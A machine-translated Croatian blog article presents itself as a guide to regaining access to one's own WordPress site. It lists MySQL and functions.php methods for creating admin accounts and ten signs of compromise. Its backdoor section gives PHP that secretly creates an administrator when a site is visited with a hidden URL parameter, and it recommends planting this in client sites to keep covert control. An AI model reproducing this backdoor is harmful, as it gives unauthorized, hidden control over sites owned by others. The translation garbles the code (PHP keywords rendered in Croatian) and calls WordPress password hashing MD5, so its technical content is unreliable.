Kako se uprijeti u web stranicu WordPress, cjeloviti vodič

Kako se hakirati na web stranicu WordPressa, cjeloviti vodič


Ne opravdavamo, ne odobravamo niti potičemo bilo kakvo nezakonito ili zlonamjerno ponašanje! Svrha ovog članka je objasniti kako hakirati ili povratiti pristup WordPress web mjestu koje pripada vama ili da imate prava na uređivanje, administraciju i pristup. Što god učinite, to radite sami. Nismo odgovorni za vaše postupke. Ovaj vodič služi samo u obrazovne svrhe.

Opisane metode pomoći će vam da vratite pristup web mjestu čak i ako više nemate račun, ali zatražit će vam neke informacije o web mjestu i neće vam pomoći da upadnete u bilo koju slučajnu WordPress instalaciju.

U ovom ćemo vam vodiču pokazati:

  • Kako se hakirati na web stranicu WordPressa
  • Kako stvoriti backdoor u programu WordPress
  • Kako stvoriti novi korisnički račun putem FTP-a
  • 10 znakova da je vaša web stranica WordPress hakirana

Kako se hakirati na web stranicu WordPressa, cjeloviti vodič

Situacije u kojima možete sebi pomoći

Ako se nalazite u jednoj od sljedećih situacija, naše metode pomoći će vam da vratite pristup:

  • zaboravili ste korisničko ime ili adresu e-pošte
  • opcija resetiranja lozinke ne radi na hosting poslužitelju
  • resetiranje zaporke e-pošte ne dolaze
  • više nemate pristup adresi e-pošte računa
  • znate korisničko ime i lozinku, ali kombinacija jednostavno ne funkcionira

Za upotrebu metoda opisanih u nastavku trebat će vam samo jedno od sljedećeg:

  • FTP pristup poslužitelju, ili
  • cPanel pristup poslužitelju, ili
  • pristup MySQL bazi podataka i mogućnost daljinskog povezivanja

Metoda br. 1 – MySQL način

Ovom metodom možete promijeniti lozinku (ili korisničko ime ako je potrebno) postojećeg korisnika ili stvoriti novi račun. Trebat će vam pristup cPanel ili direktan MySQL pristup bazi podataka web lokacije. Započnimo s promjenom zaporke postojećeg korisnika.

Ako koristite cPanel, prijavi (cPanelu uvijek možete pristupiti putem https://yoursite.com:2083 link), pronađite i otvorite phpMyAdmin. Popis baza podataka i tablica nalazi se na lijevoj strani. Tražite tablicu koja se završava _users. Vjerojatno će biti wp_users, ali ako na poslužitelju imate instalirano više web stranica WordPress, morate pronaći pravu.

U desnoj će se tablici nalaziti korisnik kojeg želite urediti u njoj. Slijedite isti postupak ako se povezujete s MySQL putem nekog vanjskog klijenta SQLyog. Nakon što locirate tablicu i stvarni zapis korisnika, vrijeme je za promjenu lozinke.

Kao što ste do sada vjerojatno shvatili, lozinka se sprema u user_pass polje, hashed pomoću MD5 algoritma. Otvori mrežni MD5 generator unesite lozinku koju želite koristiti i kliknite “Hash”. Kopirajte generirani niz i zamijenite izvornu lozinku s tim. U phpMyAdmin-u možete urediti polje dvostrukim klikom na njega. Postupak je sličan i kod drugih MySQL klijenata. Spremite promjene i prijavite se na WordPress sa svojom novom zaporkom.

Tablica korisnika WP-a

Korisnička imena, hashed lozinke i e-poruke pohranjuju se u wp_users tablica baze podataka

Još uvijek se koristi metoda 1 – stvaranje novog korisnika

Stvaranje novog korisnika je malo složenije, ali i dalje upravljivo za manje od minute. Stvorite novi zapis u tablici korisnika i popunite: user_login, user_pass (hashed, koristeći MD5 funkciju opisanu gore) i user_email. Sva ostala polja mogu ostati prazna; oni nisu važni. Spremite novi zapis. Jednom spremljen, MySQL će mu dati jedinstveni ID. To je broj u polju ID. Sjeti se.

Sad idi na _usermeta stol. Zapamtiti, prefiks tablice mora biti isti kao onaj korisnika. Na primjer wp_users i wp_usersmeta. Ako prefiks nije isti, uređujete pogrešnu tablicu (neke druge WP instalacije) i novi račun neće raditi. Napravit ćemo dva nova zapisa. Zanemarite umeta_id polje za obojicu. set user_id polje do vrijednosti koju ste upravo zapamtili (nova ID vrijednost u tablici korisnika). Za prvi set rekorda meta_key do wpct_user_level i meta_value do 10. Za drugi meta_key do wpct_capabilities i meta_value do a: 1: {s: 13: "administrator" b: 1;}. Spremite oboje. Gotovi ste – prijavite se!

Metoda # 2 – function.php način

Ovaj pristup se može koristiti ili uređivanjem function.php kroz cPanel ili korištenjem FTP klijenta za to. Ako koristite cPanel, pronađite File Manager i otvorite ga. Prvo moramo pronaći mapu aktivne teme.

Ići public_html / wp_content / teme mapu. Ako odmah vidite svoju temu i znate koja je to – sjajno. Otvorite mapu i počnite uređivati functions.php. Ako ne, otvorite stranicu, desnom tipkom miša kliknite bilo gdje, odaberite “Prikaži izvor”. Zatim pritisnite Ctrl + F i započnite tipkati / Teme / uskoro ćete istaknuti puno URL-ova i prepoznat ćete naziv mape aktivne teme.

Pronađite ga u strukturi datoteka, otvorite i počnite uređivati functions.php. Kopirajte / zalijepite sljedeći kôd na kraju datoteke. Pazite na zatvaranje ?> PHP oznake ako ih imate. Moraju biti na zadnjem redu. Dakle, umetnite kôd pred njih.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

if (! korisničko ime_objavljuje ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (niz ('ID' => $ user_id, 'nadimak' => $ new_user_email));

$ user = novi WP_User ($ user_id);
$ User> set_role ( 'Administrator');
}

Uredite samo prva dva retka koda kako bi odražavali vaš novi račun. Ako u WP-u već postoji korisnik s tom e-poštom, novi račun neće biti stvoren, pa provjerite je li novi. Promijenite i zaporku – nemojte vas hakirati djeca sa skripta. Nakon spremanja datoteke jednostavno otvorite svoju web lokaciju, kôd će se pokrenuti, stvoren je novi račun s povlasticama administratora i moći ćete se prijaviti s njim.

Nakon što to učinite, ne zaboravite izbrisati kod functions.php.

Druge metode hakiranja

Poznavajući lozinku za FTP, cPanel ili MySQL, dokazujete da imate legitimno pravo pristupa poslužitelju i stoga biste trebali imati pristup i instalacijama WordPressa. Ako nemate nijedan od tih računa, onda vam nije dobro (probijanje web-lokacija drugih ljudi) i to nije lijepo!

Imajte na umu da je neovlašteni pristup bilo kojem računalu, web mjestu ili poslužitelju ozbiljan zločin i brzo se rješava u većini zemalja.

Ako se plašite da vaša web stranica WordPress može biti hakirana, provjerite ovu stranicu besplatnim sigurnosnim skenerom za WordPress. Ako nemate vremena za postavljanje bloga, učinite to za vas.

Kako stvoriti backdoor u programu WordPress

Kad su ulazna vrata zatvorena, možete pokušati stražnja vrata. Ovo može zvučati kao zlonamjerni način korištenja koda za ulazak na web lokaciju bez pristupa njoj, ali zapravo postoje slučajevi kada trebate kontrolirati svoju web lokaciju ako ju je netko ukrao.

Ako stvarate web stranice za druge ljude koji nešto učinite, prije ili kasnije naći će se klijent koji će vam odbiti platiti za vaš rad; klijent koji će izbrisati vaše podatke za prijavu i preuzeti kontrolu nad svime što ste učinili. Ponekad će biti dovoljno stvoriti novog korisnika putem FTP-a ili resetirati lozinku. Kad to nije dovoljno, možda biste htjeli probiti svoj povratak ili stvoriti backdoor pristup administratorima.

Ali ako ste odlučili sakriti mali komad koda u vašem WordPress okruženju, uštedjeli biste nešto dostojanstva i dobiti pristup web mjestu WordPress s povlasticama administratora. I tu počinju igre.

Bez obzira koliko puta taj lopov izbrisao vaše podatke ili vratio sigurnosnu kopiju na poslužitelju koji vjerojatno posjeduje, postoji šansa da ne zna ništa o stražnjim ulazima. Da jest, vjerovatno vam ne bi ni trebala pomoć u postavljanju WordPressa, zar ne?

Napravite stražnju vrata:

OK, dosta s razgovorom; ovdje je dio koda koji će vam trebati da biste dovršili posao:

  1. Otvorite function.php datoteku
  2. Kopirajte / lijepite sljedeći kôd:
  3. dodavanje ('wp_head', 'wploop_backdoor');
    funkcija wploop_backdoor () {
    If ($ _GET ['backdoor'] == 'knockknock') {
    zahtijevaju ( 'wp-obuhvaća / registration.php');
    If (! Korisničko ime_exists ('korisničko ime')) {
    $ user_id = wp_create_user ('ime', 'prolaz');
    $ user = novi WP_User ($ user_id);
    $ User> set_role ( 'Administrator');
    }
    }
    }
    ?>
  4. Spremi promjene

Ako kod ostavite kakav je, posjetite sve što biste trebali stvoriti novog administratora na web mjestu http://www.yourdomain.com/?backdoor=knockknock

Nakon učitavanja stranice vaše je novo korisničko ime “Ime” i lozinku “proći”.

Naravno, možete to promijeniti u kodu gore mijenjanjem ‘imena’ i ‘pass’ na sve što želite. Možete također promijeniti vezu do stražnjih vrata tako što ćete promijeniti “zadnju vrata” i / ili “knockknock” na bilo što što naiđete.

Isprobajte funkciju – ne samo da je zabavna, već vam može zaista pomoći ponekad u budućnosti kad napravite web mjesto za nekoga u koga ne možete u potpunosti vjerovati. Vi bi također trebali poboljšati svoje WordPress i vještine bloganja.

Kako stvoriti novi korisnički račun putem FTP-a

Stvaranje novih korisničkih računa na WordPressu vrlo je jednostavno. Kao administrator morate to učiniti prijeđite na Korisničku stranicu korisnika na kojem možete stvoriti novi račun za bilo koju korisničku ulogu. To se može učiniti za nekoliko sekundi, a novostvoreni korisnik može se odmah prijaviti s datim korisničkim imenom i lozinkom.

Ali što se događa ako izgubite pristup svom administratoru WordPressa? Stvari bi se mogle malo zakomplicirati, ali ne brinite – za vas imamo funkciju koja vam može spasiti život administratora.

Bez obzira na to je li neki drugi administrator izbrisao vaš račun, jeste li izbrisali sve korisnike iz baze podataka, upotrebljavali neispravan dodatak ili se hakirali, i dalje možete dobiti kontrolu. Ponekad ćete moći dobiti pristup samo vašem FTP poslužitelju, dok će HTTP biti izvan vašeg dosega i morat ćete stvoriti novog administratora. Iako je to može biti rijedak slučaj, sljedeća funkcija će vas spasiti.

Za stvaranje novog računa izvan WordPress administrativnog okruženja, sve što će vam trebati je FTP pristup vašoj web stranici. Kao administrator, trebali biste imati sve potrebne informacije da biste se prijavili na poslužitelj i brzo možete stvoriti novi račun kreiranjem nove funkcije u svojoj temi.

Kreirajte novi korisnički račun putem FTP-a:

  1. Otvorite FTP klijent i povežite se s vašim računom
  2. Dođite do wp-sadržaja / tema
  3. Otvorite mapu teme koju koristite
  4. Potražite funkciju.php datoteku i uredite je
  5. Kopirajte i zalijepite sljedeću funkciju:
  6. funkcija admin_account () {
    $ user = 'Korisničko ime';
    $ pass = 'Lozinka';
    $ email = '[email protected]';
    if (! korisničko ime_exists ($ korisnik) &&! email_exists ($ email)) {
    $ user_id = wp_create_user ($ korisnik, $ pass, $ e-pošta);
    $ user = novi WP_User ($ user_id);
    $ user-> set_role ('administrator');
    }}
    ADD_ACTION ( 'init', 'admin_account');
    
  7. Promijenite korisničko ime, lozinku i e-poštu u nešto jedinstveno
  8. Spremi promjene

Provjerite jesu li korisničko ime, zaporka i adresa e-pošte koju ste postavili u funkciji jedinstveni ili na drugi način funkcija neće raditi ispravno. Nakon što spremite promjene, završite i možete se kretati do svoje WP ploče za prijavu. Upotrijebite nove podatke za prijavu i nakon što potvrdite račun, funkciju možete izbrisati iz datoteke function.php.

Gore prikazana funkcija stvara administratorski račun, ali možete ga lako izmijeniti kako biste stvorili račun s bilo kojom drugom korisničkom ulogom. Jednostavno promijenite ulogu na 8th red koda uredniku, autoru, suradniku, pretplatniku ili bilo kojoj drugoj korisničkoj ulozi koju ste stvorili.

Nažalost, ako ste izgubili administratorski račun, izgubili ste i sve postove napisane pod tim korisničkim imenom. Zbog toga biste uvijek trebali izrađivati ​​sigurnosne kopije koje lako možete dohvatiti. Ako to čitate dok imate račun za administraciju, uzmi ovo kao podsjetnik da odmah stvori sigurnosnu kopiju i dodajte oznaku ovom članku, samo u slučaju da u budućnosti morate otvoriti račun izvan WordPress-a.

10 znakova da je vaša web stranica WordPress hakirana

WordPress je ogromna platforma za pisanje blogova. Postoje milijuni korisnika i čini se da taj broj svakodnevno brzo raste. Ljudi čak imaju tendenciju da češće prenose svoje web stranice kreirane u drugim sustavima za upravljanje sadržajem u ovaj open source sustav nego što možda mislite. I dok je ovo dobro, to znači i to hakeri će također staviti WordPress na mjesto broj jedan prilikom pokušaja invazije na nasumične stranice.

Obično ako vas netko napadne, odmah ćete to znati. Vaša će web lokacija postati nedostupna; nećete se moći prijaviti, a ponekad će čak i haker ostaviti poruku na naslovnoj stranici. Ali češće nego ne, možda nećete ni primijetiti da se nešto promijenilo. U ovom ćemo dijelu članka pokazati nekoliko znakova koji bi vam mogli pokazati da je vaša web stranica WordPress hakirana i nekoliko rješenja problema..

1. Neuspješna prijava

Ovaj je znak prilično vidljiv. Ako neko vrijeme koristite kombinaciju korisničkog imena i zaporke, a da niste imali problema, možete postati sumnjičavi ako iznenada WordPress ne prepozna vaš račun. Ako se haker prijavi na vašu web lokaciju, velike su šanse da će brzo promijeniti privilegije vašeg administratora.

Možda je morao promijeniti zaporku ili potpuno izbrisati vaš račun. Prije nego što počnete paničariti nakon što vam prvi put WordPress pošalje poruku o pogrešnom korisničkom imenu / zaporci, uzmite u obzir činjenicu da ste možda unijeli pogrešnu kombinaciju ili da ste možda uključili gumb za zaključavanje s velikim slovima.

Riješenje: Pokušajte vratiti lozinku putem e-pošte ili upotrijebite drugi račun za prijavu. Da biste bili sigurni da će prijava ostati sigurna, preporučujemo instaliranje Prijava Ninja dodatak za WordPress.

2. Vašem web mjestu dodaje se zlonamjerni sadržaj

Web mjesto sadrži upozorenje o zlonamjernom softveru

Ako počnete primjećivati ​​nepoznati sadržaj na svojoj web lokaciji, možete se zabrinuti. Kad dobiju priliku da pristupe vašem administrativnom području, hakeri će moći promijeniti vašu jezgru i vaše teme tema i dodataka. To znači da mogu promijeniti sve što žele.

Dok će neki hakeri drastično izmijeniti izgled vaše web stranice i možda čak napomenuti da ste se hakirali, drugi će biti puno suptilniji u vezi s tim.

Riješenje: Pokušajte potražiti skriveni sadržaj u kodu web mjesta. Mogle bi biti veze do zlonamjernih hakera na web mjestu postavljenim u podnožju vaše web stranice ili su možda instalirani skočni prozori koji će se redovito otvarati vašim kupcima. Upotrijebite Security Ninja za skeniranje vaše web stranice ili kontinuirano nadziranje web lokacije zbog takvih problema.

3. Sumnjivi posjeti

Ako ne pratite svoju web lokaciju, trebali biste to početi odmah. Jednostavan način rada je upotreba Google Analyticsa koji vam, među mnogim drugim značajkama, može otkriti koliko posjetite i odakle dolaze te posjete. Nakon nekog vremena, upoznat ćete svoju web stranicu. To znači da ćete znati odakle dolaze posjete, znat ćete kada pokrenete novu kampanju i kada se u divljini pojave nove promotivne veze.

Ali ako iznenada primijetite da vaša web stranica prima ogroman broj novih posjeta iz sumnjive domene, htjet ćete to dodatno istražiti jer vaša web lokacija može biti hakirana. Obično će takve posjete rezultirati stopostotnom stopom napuštanja početne stranice što znači da je pristupljeno samo jednoj stranici. Hakeri će često koristiti automatizirane sustave koji će dovesti druge loše stranice na vaša. Bilo da se radi o lošem kodu koji se izvršava na vašoj web lokaciji ili ste postali dio mreže neželjene pošte, stvari mogu postati ozbiljne i morat ćete provjeriti na web mjestu zbog zlonamjernog koda.

Riješenje: Koristiti Google Webmasters Tools pronaći sumnjive domene

4. Nagli pad prometa

Sigurno pregledavanje statusa web-lokacije

Za razliku od posljednjeg spomenutog znaka hakiranja, ovaj vas može upozoriti jer naglo pada broj posjeta. Umjesto da vas upućuje na nove posjete, haker može slati posjete s vaše web lokacije. To se može dogoditi jer je haker preusmjerio vašu web lokaciju na drugu. Drugi razlog za dobivanje manje posjetitelja je taj što je Google na vašu web lokaciju stavio na crni popis. Ova akcija prikazala bi poruku svakom korisniku koji može odlučiti da ne otvara vašu web lokaciju jer je zaražena.

Riješenje: Upotrijebite Googleove Sigurno pregledavanje statusa web mjesta kako biste provjerili je li vaša web lokacija označena kao nesigurna i trenutno je opasna za posjet.

5. Rezultati tražilice su čudni

Ako na svojoj web lokaciji niste primijetili nikakve promjene, ali otkrijete da su rezultati pretraživanja na Googleu i drugim tražilicama čudni (prikazujte različite naslove i druge meta-podatke), to može biti jasan znak hakirane web lokacije. Haker je možda promijenio vaš sadržaj na način koji može biti vidljiv samo stručnjaku. Ipak, promjena bi bila vidljiva u rezultatima tražilice.

Riješenje: Provjerite svoju web lokaciju Google Webmasters Tools, i provjerite je li se vaša web lokacija hakirala besplatni online alat.

6. Ne možete slati / primati e-poštu

Jednom kada haker dobije pristup vašoj web stranici, vjerojatno će to htjeti koristite svoj poslužitelj za neželjenu poštu svima drugima. Kad otkrijete da ne možete slati ili primati nove e-poruke sa svog WordPressa, to može biti jasan znak da ste se hakirali. Još jednom provjerite svoju e-poštu, a zatim provjerite da li nema pogrešaka.

Riješenje: Testirajte svoj WordPress funkcija pošte s ovim besplatnim dodatkom.

7. Web mjesto ne postoji

Poslužitelj nije pronađen

Ima slučajeva kada hakeri neće pristupiti vašoj web lokaciji kako bi postavili zlonamjerni kôd, preusmjeravali korisnike ili upotrebljavali vašu e-poštu za neželjenu poštu. Ponekad, sve što će htjeti je srušiti vaše web mjesto. Rijetko koji haker uspješno će izbrisati sve sa cijelog poslužitelja. Zbog toga je važno da svoje datoteke hostujete u renomiranoj hosting tvrtki koja će preuzeti sigurnost i istovremeno održavati dnevne ili barem tjedne sigurnosne kopije vaše web stranice. Dobra je praksa da i sami napravite sigurnosne kopije s vremena na vrijeme kako bi se web mjesto brzo vratilo.

Riješenje: Instalirajte jedan od najboljih dodataka za upravljanje sigurnosnim kopijama u WordPressu.

8. Sumnjive datoteke

Slično zlonamjernom sadržaju koji se može dodati postojećim datotekama, haker može posaditi dodatne datoteke bilo gdje u vašoj korijenskoj mapi. Dobro je znati svoj put oko WordPressa, ali ako niste tako iskusni, trebali biste imati na raspolaganju sigurnosni alat koji može provjeriti sve vaše datoteke i aktivnosti. Nedavno smo pregledali Security Ninja koji je savršen alat za provjeru svih vaših WordPress datoteka.

Riješenje: Pokušajte potražiti datoteke koje ne pripadaju vašoj WordPress instalaciji. Upotrijebite Security Ninja za redovito skeniranje web lokacije i pronalaženje tih datoteka automatski. Zatim izbrišite datoteke ili uklonite zlonamjerni kod iz zaraženih datoteka. Ne zaboravite dodatak Core Scanner za sigurnost Ninja.

9. Novi članovi

Ovisno o vašem mjestu, možda ste jedini koji može dodati nove članove. U tom slučaju e-poruka koja vam govori o novo registriranim korisnicima može pokrenuti alarm. Ako postoje drugi administratori koji mogu dodavati nove članove, provjerite s njima sumnjivu aktivnost.

Riješenje: Promijenite URL za prijavu besplatnim dodatkom, ograničite pristup svojoj WordPress stranici za prijavu pomoću .htpasswd datoteke i koristite Login Ninja za zaštitu forme za prijavu cijelo vrijeme.

10. Provjerite planirane događaje na vašem poslužitelju

Ponekad haker neće učiniti nešto na vašoj web lokaciji nakon što pronađu svoj put. Umjesto toga, oni će napustiti zakazane događaje što bi moglo štetiti vašoj web lokaciji u budućnosti. Ova je tehnika opasna jer haker u početku može neiskusnu žrtvu ostaviti bez riječi. Možda ste zaraženi i o tome ništa ne znate.

Riješenje: Provjerite svoje CRON zadatke na poslužitelju koji koristite i uvjerite se da nema sumnjivih zakazanih zadataka.

Završavati

Nadamo se da će vam ovaj članak pomoći u upravljanju čak i sigurnijim WordPress web mjestom te da će vam pomoći da vratite pristup njemu u lošim situacijama. I čak i ako je vaša web lokacija čista, nemojte to uzimati zdravo za gotovo.
Uvijek budite sigurni da je vaš blog jednako siguran koliko može biti. Predlažemo sigurnosne dodatke za WordPress koji vas mogu uštedjeti u većini slučajeva. Ipak, nemojte biti onaj koji koristi nesigurnu lozinku i budite oprezni prilikom provale na vlastito WordPress web mjesto.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map